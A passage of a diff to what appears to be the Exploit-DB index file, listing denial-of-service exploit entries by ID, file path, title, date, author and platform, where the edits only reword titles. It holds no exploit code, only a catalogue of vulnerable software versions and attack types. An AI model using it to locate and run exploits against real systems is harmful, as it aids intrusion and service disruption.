18734,platforms/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - Denial of Service",2012-04-12,"Luigi Auriemma",hardware,dos,0 18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 @@ -2234,7 +2234,7 @@ id,file,description,date,author,platform,type,port 19082,platforms/linux/dos/19082.txt,"AMD K6 Processor - Exploit",1998-06-01,Poulot-Cazajous,linux,dos,0 19085,platforms/linux/dos/19085.c,"Linux Kernel 2.0/2.1 - Send a SIGIO Signal To Any Process",1998-06-30,"David Luyer",linux,dos,0 19089,platforms/windows/dos/19089.txt,"Microsoft Windows OpenType Font - File Format Denial of Service",2012-06-12,Cr4sh,windows,dos,0 -19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 +19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19103,platforms/linux/dos/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,dos,0 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0 @@ -2324,7 +2324,7 @@ id,file,description,date,author,platform,type,port 19596,platforms/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long 'Username' Denial of Service",1999-11-03,"Ussr Labs",windows,dos,0 19605,platforms/linux/dos/19605.c,"Linux Kernel 3.2.24 - 'fs/eventpoll.c' Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 19615,platforms/unix/dos/19615.c,"ISC BIND 8.2.2 / IRIX 6.5.17 / Solaris 7.0 - NXT Overflow / Denial of Service",1999-11-10,"ADM Crew",unix,dos,0 -19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0 +19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow",1999-11-08,Interrupt,windows,dos,0 19619,platforms/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server - Denial of Service",1999-11-10,"Ussr Labs",windows,dos,0 19624,platforms/windows/dos/19624.txt,"Gene6 G6 FTP Server 2.0 - Buffer Overflow Denial of Service",1999-11-17,"Ussr Labs",windows,dos,0 19635,platforms/solaris/dos/19635.c,"Sun Solaris 7.0 - rpc.ttdbserver Denial of Service",1999-11-19,"Elias Levy",solaris,dos,0 @@ -2370,13 +2370,13 @@ id,file,description,date,author,platform,type,port 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0 19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service",2000-04-12,eAX,windows,dos,0 -19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0 +19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow",2000-04-16,"Michal Zalewski",linux,dos,0 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0 19856,platforms/windows/dos/19856.txt,"RealNetworks Real Server 7.0 / GameHouse dldisplay ActiveX control 0 - Denial of Service",2000-04-20,"Ussr Labs",windows,dos,7070 19960,platforms/windows/dos/19960.txt,"Oracle Outside-In - '.FPX' File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19866,platforms/windows/dos/19866.pl,"DomsHttpd 1.0 - Remote Denial of Service",2012-07-16,"Jean Pascal Pereira",windows,dos,0 -19869,platforms/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0 / RedHat imap 4.5 -4_ UoW imap 4.5 popd - Lock File Denial of Service",2000-04-19,"Alex Mottram",linux,dos,0 +19869,platforms/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0 / RedHat imap 4.5 -4 / UoW imap 4.5 popd - Lock File Denial of Service",2000-04-19,"Alex Mottram",linux,dos,0 19870,platforms/linux/dos/19870.pl,"CVS 1.10.7 - Local Denial of Service",2000-04-23,"Michal Szymanski",linux,dos,0 19880,platforms/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 - Port Scan Denial of Service",2000-04-25,Vacuum,windows,dos,0 19884,platforms/windows/dos/19884.txt,"Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow",2000-05-01,"Ussr Labs",windows,dos,0 @@ -2389,8 +2389,8 @@ id,file,description,date,author,platform,type,port 19923,platforms/hardware/dos/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 - Denial of Service",2000-05-17,cassius,hardware,dos,0 19965,platforms/multiple/dos/19965.txt,"HP JetAdmin 6.0 - Printing Denial of Service",2000-05-24,"Ussr Labs",multiple,dos,0 19938,platforms/beos/dos/19938.txt,"BeOS 5.0 - TCP Fragmentation Remote Denial of Service",2000-05-18,visi0n,beos,dos,0 -19940,platforms/windows/dos/19940.c,"Axent NetProwler 3.0 - Malformed IP Packets Denial of Service (1)",2000-05-18,"rain forest puppy",windows,dos,0 -19941,platforms/windows/dos/19941.casl,"Axent NetProwler 3.0 - Malformed IP Packets Denial of Service (2)",2000-05-18,"Pedro Quintanilha",windows,dos,0 +19940,platforms/windows/dos/19940.c,"Axent NetProwler 3.0 - IP Packets Denial of Service (1)",2000-05-18,"rain forest puppy",windows,dos,0 +19941,platforms/windows/dos/19941.casl,"Axent NetProwler 3.0 - IP Packets Denial of Service (2)",2000-05-18,"Pedro Quintanilha",windows,dos,0 19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver - Denial of Service",2000-05-18,"Chris Evans",linux,dos,0 19961,platforms/windows/dos/19961.txt,"Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19962,platforms/windows/dos/19962.txt,"Oracle Outside-In JP2 - File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 @@ -2428,7 +2428,7 @@ id,file,description,date,author,platform,type,port 20098,platforms/multiple/dos/20098.txt,"Netscape Communicator 4.x - JPEG-Comment Heap Overwrite",2000-07-25,"Solar Designer",multiple,dos,0 20099,platforms/windows/dos/20099.c,"AnalogX Proxy 4.0 4 - Denial of Service",2000-07-25,wildcoyote,windows,dos,0 20100,platforms/windows/dos/20100.pl,"WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service",2000-07-21,"Blue Panda",windows,dos,0 -20101,platforms/windows/dos/20101.pl,"WFTPD 2.4.1RC11 - REST Command Malformed File Write Denial of Service",2000-07-21,"Blue Panda",windows,dos,0 +20101,platforms/windows/dos/20101.pl,"WFTPD 2.4.1RC11 - 'REST' Malformed File Write Denial of Service",2000-07-21,"Blue Panda",windows,dos,0 20102,platforms/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - Unauthenticated MLST Command Remote Denial of Service",2000-07-21,"Blue Panda",windows,dos,0 20167,platforms/linux/dos/20167.txt,"eGlibc - Signedness Code Execution",2012-08-01,c0ntex,linux,dos,0 20175,platforms/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 - rexec Buffer Overflow",2000-08-24,"Ussr Labs",windows,dos,0 @@ -2571,11 +2571,11 @@ id,file,description,date,author,platform,type,port 21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,hardware,dos,0 40420,platforms/multiple/dos/40420.txt,"Adobe Flash - Video Decompression Memory Corruption",2016-09-23,"Google Security Research",multiple,dos,0 21040,platforms/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service",2001-07-30,"Paul Starzetz",windows,dos,0 -21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 - Possible Buffer Overflow",2001-07-29,Coolest,multiple,dos,0 +21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 - Buffer Overflow",2001-07-29,Coolest,multiple,dos,0 21047,platforms/windows/dos/21047.txt,"Microsoft Windows NT 4.0 - NT4ALL Denial of Service",2001-08-03,hypoclear,windows,dos,0 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 - Denial of Service",1999-04-09,Epic,cgi,dos,0 21074,platforms/unix/dos/21074.pl,"glFTPd 1.x - 'LIST' Denial of Service",2001-08-17,"ASGUARD LABS",unix,dos,0 -21077,platforms/bsd/dos/21077.c,"BSDI 3.0/3.1 - Possible Local Kernel Denial of Service",2001-08-21,V9,bsd,dos,0 +21077,platforms/bsd/dos/21077.c,"BSDI 3.0/3.1 - Local Kernel Denial of Service",2001-08-21,V9,bsd,dos,0 21092,platforms/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service Vulnerabilities",2001-08-23,"Cisco Security",hardware,dos,0 40419,platforms/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",linux,dos,0 21099,platforms/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0 @@ -2613,7 +2613,7 @@ id,file,description,date,author,platform,type,port 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0 21275,platforms/osx/dos/21275.c,"ICQ For Mac OSX 2.6 Client - Denial of Service",2002-02-05,Stephen,osx,dos,0 21293,platforms/windows/dos/21293.pl,"Phusion WebServer 1.0 - Long URL Denial of Service",2002-02-16,"Alex Hernandez",windows,dos,0 -21296,platforms/hardware/dos/21296.c,"Cisco IOS 11/12 - Malformed SNMP Message Denial of Service",2002-02-12,kundera,hardware,dos,0 +21296,platforms/hardware/dos/21296.c,"Cisco IOS 11/12 - SNMP Message Denial of Service",2002-02-12,kundera,hardware,dos,0 21305,platforms/windows/dos/21305.c,"Galacticomm Worldgroup 3.20 - Remote FTP Denial of Service",2002-02-27,"Limpid Byte",windows,dos,0 21306,platforms/windows/dos/21306.c,"Galacticomm Worldgroup 3.20 - Remote Web Server Denial of Service",2002-02-27,"Limpid Byte",windows,dos,0 21307,platforms/windows/dos/21307.txt,"Rit Research Labs The Bat! 1.53 - Microsoft Denial of Service Device Name Denial of Service",2002-02-27,3APA3A,windows,dos,0 @@ -2748,7 +2748,7 @@ id,file,description,date,author,platform,type,port 22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",hardware,dos,0 22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0 22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0 -22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 +22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic (Denial of Service)",2002-11-07,shibby,osx,dos,0 22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 @@ -2788,7 +2788,7 @@ id,file,description,date,author,platform,type,port 22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server - Denial of Service",1999-05-08,wh00t,multiple,dos,0 22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4.0 - 'Riched20.dll' Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0 22258,platforms/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 - Multiple Vulnerabilities",2012-10-26,shinnai,windows,dos,0 -22259,platforms/linux/dos/22259.c,"BitchX 1.0 - Malformed RPL_NAMREPLY Denial of Service",2003-01-30,argv,linux,dos,0 +22259,platforms/linux/dos/22259.c,"BitchX 1.0 - 'RPL_NAMREPLY' Denial of Service",2003-01-30,argv,linux,dos,0 22273,platforms/linux/dos/22273.c,"Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (1)",2003-02-23,"Richard Kettlewel",linux,dos,0 22286,platforms/unix/dos/22286.html,"Netscape 6.0/7.0 - Style Sheet Denial of Service",2003-02-25,Jocke,unix,dos,0 22287,platforms/unix/dos/22287.html,"Netscape 7.0 - JavaScript Regular Expression Denial of Service",2003-02-25,dwm,unix,dos,0 @@ -2811,7 +2811,7 @@ id,file,description,date,author,platform,type,port 22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption Vulnerabilities",2003-03-21,"Auriemma Luigi",windows,dos,0 22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus - Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",windows,dos,0 -22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC)",2012-11-01,coolkaveh,windows,dos,0 +22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - 'WriteAV' Crash (PoC)",2012-11-01,coolkaveh,windows,dos,0 22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0 22407,platforms/hardware/dos/22407.txt,"NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0 22415,platforms/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",hardware,dos,0 @@ -2981,10 +2981,10 @@ id,file,description,date,author,platform,type,port 23146,platforms/windows/dos/23146.c,"Alt-N MDaemon Server 2.71 SP1 - SMTP HELO Argument Buffer Overflow",1999-03-10,Rootshell,windows,dos,0 23150,platforms/windows/dos/23150.c,"ChatZilla 0.8.23 - Remote Denial of Service",2003-09-15,D4rkGr3y,windows,dos,0 23165,platforms/windows/dos/23165.txt,"Sun Java 1.x - XML Document Nested Entity Denial of Service",2003-09-22,"Sun Microsystems",windows,dos,0 -23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities",2003-09-21,"Bahaa Naamneh",windows,dos,0 +23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow",2003-09-21,"Bahaa Naamneh",windows,dos,0 23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 - Headers Prescan Denial of Service",1998-12-12,marchew,irix,dos,0 23169,platforms/windows/dos/23169.pl,"WzdFTPD 0.1 rc5 - Login Remote Denial of Service",2003-09-23,"Moran Zavdi",windows,dos,0 -23170,platforms/linux/dos/23170.c,"ProFTPd 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun",2003-09-23,netris,linux,dos,0 +23170,platforms/linux/dos/23170.c,"ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun",2003-09-23,netris,linux,dos,0 23172,platforms/linux/dos/23172.txt,"Gauntlet Firewall for Unix 6.0 - SQL-GW Connection Denial of Service",2003-09-24,"Oliver Heinz & Thomas Neuderth",linux,dos,0 23177,platforms/windows/dos/23177.txt,"Nvidia Install Application 2.1002.85.551 - 'NVI2.dll' Unicode Buffer Overflow (PoC)",2012-12-06,LiquidWorm,windows,dos,0 23181,platforms/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",multiple,dos,0 @@ -3023,7 +3023,7 @@ id,file,description,date,author,platform,type,port 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 - HTTP Referer Remote Buffer Overflow",2003-10-29,"Oliver Karow",windows,dos,0 23311,platforms/php/dos/23311.txt,"E107 - 'Chatbox.php' Denial of Service",2003-10-29,Blademaster,php,dos,0 23325,platforms/multiple/dos/23325.c,"BRS Webweaver 1.06 - HTTPd 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 -23337,platforms/windows/dos/23337.c,"Avaya Argent Office - Malformed DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos,0 +23337,platforms/windows/dos/23337.c,"Avaya Argent Office - DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos,0 23339,platforms/openbsd/dos/23339.c,"OpenBSD 2.x/3.x - Local Malformed Binary Execution Denial of Service",2003-11-04,"Georgi Guninski",openbsd,dos,0 23347,platforms/linux/dos/23347.txt,"IBM DB2 db2start - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 23348,platforms/linux/dos/23348.txt,"IBM DB2 db2stop - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 @@ -3079,7 +3079,7 @@ id,file,description,date,author,platform,type,port 23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,windows,dos,0 23690,platforms/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",linux,dos,0 23633,platforms/windows/dos/23633.txt,"Crob FTP Server 3.5.1 - Denial of Service",2004-02-02,"Zero X",windows,dos,0 -23638,platforms/hardware/dos/23638.pl,"Cisco IOS 12 MSFC2 - Malformed Layer 2 Frame Denial of Service",2004-02-03,blackangels,hardware,dos,0 +23638,platforms/hardware/dos/23638.pl,"Cisco IOS 12 MSFC2 - Layer 2 Frame Denial of Service",2004-02-03,blackangels,hardware,dos,0 23641,platforms/multiple/dos/23641.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service (1)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23642,platforms/multiple/dos/23642.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service (2)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0 @@ -3089,8 +3089,8 @@ id,file,description,date,author,platform,type,port 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0 23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0 23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0 -23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0 -23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Vulnerabilities",2004-02-09,"Bruno Morisson",hardware,dos,0 +23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 - UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0 +23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Exploit",2004-02-09,"Bruno Morisson",hardware,dos,0 23681,platforms/windows/dos/23681.pl,"EvolutionX - Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0 23700,platforms/windows/dos/23700.txt,"ACLogic CesarFTP 0.99 - Remote Resource Exhaustion (Denial of Service)",2004-02-16,"intuit e.b.",windows,dos,0 23701,platforms/windows/dos/23701.txt,"Xlight FTP Server 1.52 - Remote Send File Request Denial of Service",2004-02-16,"intuit e.b.",windows,dos,0 @@ -3144,7 +3144,7 @@ id,file,description,date,author,platform,type,port 23944,platforms/windows/dos/23944.php,"Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0 23945,platforms/unix/dos/23945.txt,"Ettercap 0.7.5.1 - Stack Overflow",2013-01-07,"Sajjad Pourali",unix,dos,0 23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service",2004-04-12,"Nikita V. Youshchenko",linux,dos,0 -23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x - Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0 +23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x - Format String",2004-04-14,"Thomas Wana",linux,dos,0 24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 - MIME Message Nesting Denial of Service",2004-04-14,"Paul Szabo",windows,dos,0 24002,platforms/windows/dos/24002.py,"Microsoft Outlook Express 6.0 - Remote Denial of Service",2004-04-14,"Ben Rampling",windows,dos,0 24010,platforms/windows/dos/24010.txt,"Real Networks Helix Universal Server 9.0.x - Denial of Service",2004-04-15,anonymous,windows,dos,0 @@ -3277,7 +3277,7 @@ id,file,description,date,author,platform,type,port 24770,platforms/windows/dos/24770.py,"Jabber Server 2.0 - Multiple Remote Buffer Overflow Vulnerabilities",2004-11-24,icbm,windows,dos,0 24775,platforms/windows/dos/24775.html,"Microsoft Internet Explorer 6 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos,0 24776,platforms/windows/dos/24776.html,"Mozilla Firefox 0.8/0.9/0.10 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos,0 -24777,platforms/linux/dos/24777.txt,"Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities",2004-11-25,"Florian Heinz",linux,dos,0 +24777,platforms/linux/dos/24777.txt,"Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure",2004-11-25,"Florian Heinz",linux,dos,0 24778,platforms/multiple/dos/24778.html,"Sun Java Applet 1.x - Invocation Version Specification",2004-11-25,"Peter Greenwood",multiple,dos,0 24780,platforms/osx/dos/24780.html,"Apple Safari Web Browser 1.x - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",osx,dos,0 24781,platforms/multiple/dos/24781.html,"Mozilla Camino Web Browser 0.7/0.8 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",multiple,dos,0 @@ -3293,7 +3293,7 @@ id,file,description,date,author,platform,type,port 24818,platforms/multiple/dos/24818.txt,"Digital Illusions CE Codename Eagle - Remote Denial of Service",2004-12-13,"Luigi Auriemma",multiple,dos,0 24828,platforms/linux/dos/24828.txt,"Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution",2004-12-13,"Giovanni Delvecchio",linux,dos,0 24839,platforms/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer - Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",hardware,dos,0 -24841,platforms/windows/dos/24841.txt,"Adobe Acrobat / Acrobat Reader 6.0 - ETD File Parser Format String",2004-12-14,"Greg MacManus",windows,dos,0 +24841,platforms/windows/dos/24841.txt,"Adobe Acrobat / Acrobat Reader 6.0 - '.ETD' File Parser Format String",2004-12-14,"Greg MacManus",windows,dos,0 24843,platforms/osx/dos/24843.txt,"Apple Safari Web Browser 1.x - HTML Form Status Bar Misrepresentation",2004-12-15,Guillaume,osx,dos,0 24855,platforms/php/dos/24855.txt,"PHP 3/4/5 - Local/Remote Multiple Vulnerabilities (2)",2004-12-15,Slythers,php,dos,0 24865,platforms/linux/dos/24865.txt,"GnuTLS libgnutls - Double-Free Certificate List Parsing Remote Denial of Service",2013-03-22,"Shawn the R0ck",linux,dos,0 @@ -3328,7 +3328,7 @@ id,file,description,date,author,platform,type,port 25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0 -25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 +25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service",2005-02-19,MurDoK,hardware,dos,0 25128,platforms/windows/dos/25128.txt,"Easy Icon Maker 5.01 - Crash (PoC)",2013-05-01,Asesino04,windows,dos,0 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - 'Date' Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0 @@ -3455,7 +3455,7 @@ id,file,description,date,author,platform,type,port 26601,platforms/linux/dos/26601.pl,"Unalz 0.x - Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",linux,dos,0 26648,platforms/linux/dos/26648.c,"Linux Kernel 2.6.x - Time_Out_Leases PrintK Local Denial of Service",2005-11-29,"Avi Kivity",linux,dos,0 26665,platforms/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x - Authentication Denial of Service",2006-01-17,"David Maciejak",windows,dos,0 -26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 - Malformed Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",linux,dos,0 +26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 - Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",linux,dos,0 26690,platforms/windows/dos/26690.c,"Microsoft Windows XP/2000/2003 - CreateRemoteThread Local Denial of Service",2005-12-01,"Nima Salehi",windows,dos,0 26710,platforms/multiple/dos/26710.txt,"Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos,0 26733,platforms/windows/dos/26733.py,"Jolix Media Player 1.1.0 - '.m3u' Denial of Service",2013-07-10,IndonesiaGokilTeam,windows,dos,0 @@ -3472,7 +3472,7 @@ id,file,description,date,author,platform,type,port 26833,platforms/hardware/dos/26833.txt,"Cisco Catalyst Switches (Multiple Devices) - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26834,platforms/hardware/dos/26834.txt,"Westell Versalink 327W - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26835,platforms/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 -26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012)",2005-12-19,ad@heapoverflow.com,windows,dos,0 +26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption (MS06-012)",2005-12-19,ad@heapoverflow.com,windows,dos,0 26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - Denial of Service (PoC)",2013-07-16,kingcope,linux,dos,0 26887,platforms/linux/dos/26887.rb,"rpcbind - CALLIT procedure UDP Crash (PoC)",2013-07-16,"Sean Verity",linux,dos,0 26891,platforms/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - '.wav' Crash (PoC)",2013-07-16,ariarat,windows,dos,0 @@ -3514,7 +3514,7 @@ id,file,description,date,author,platform,type,port 27241,platforms/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service",2006-02-16,l0om,hardware,dos,0 27246,platforms/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of 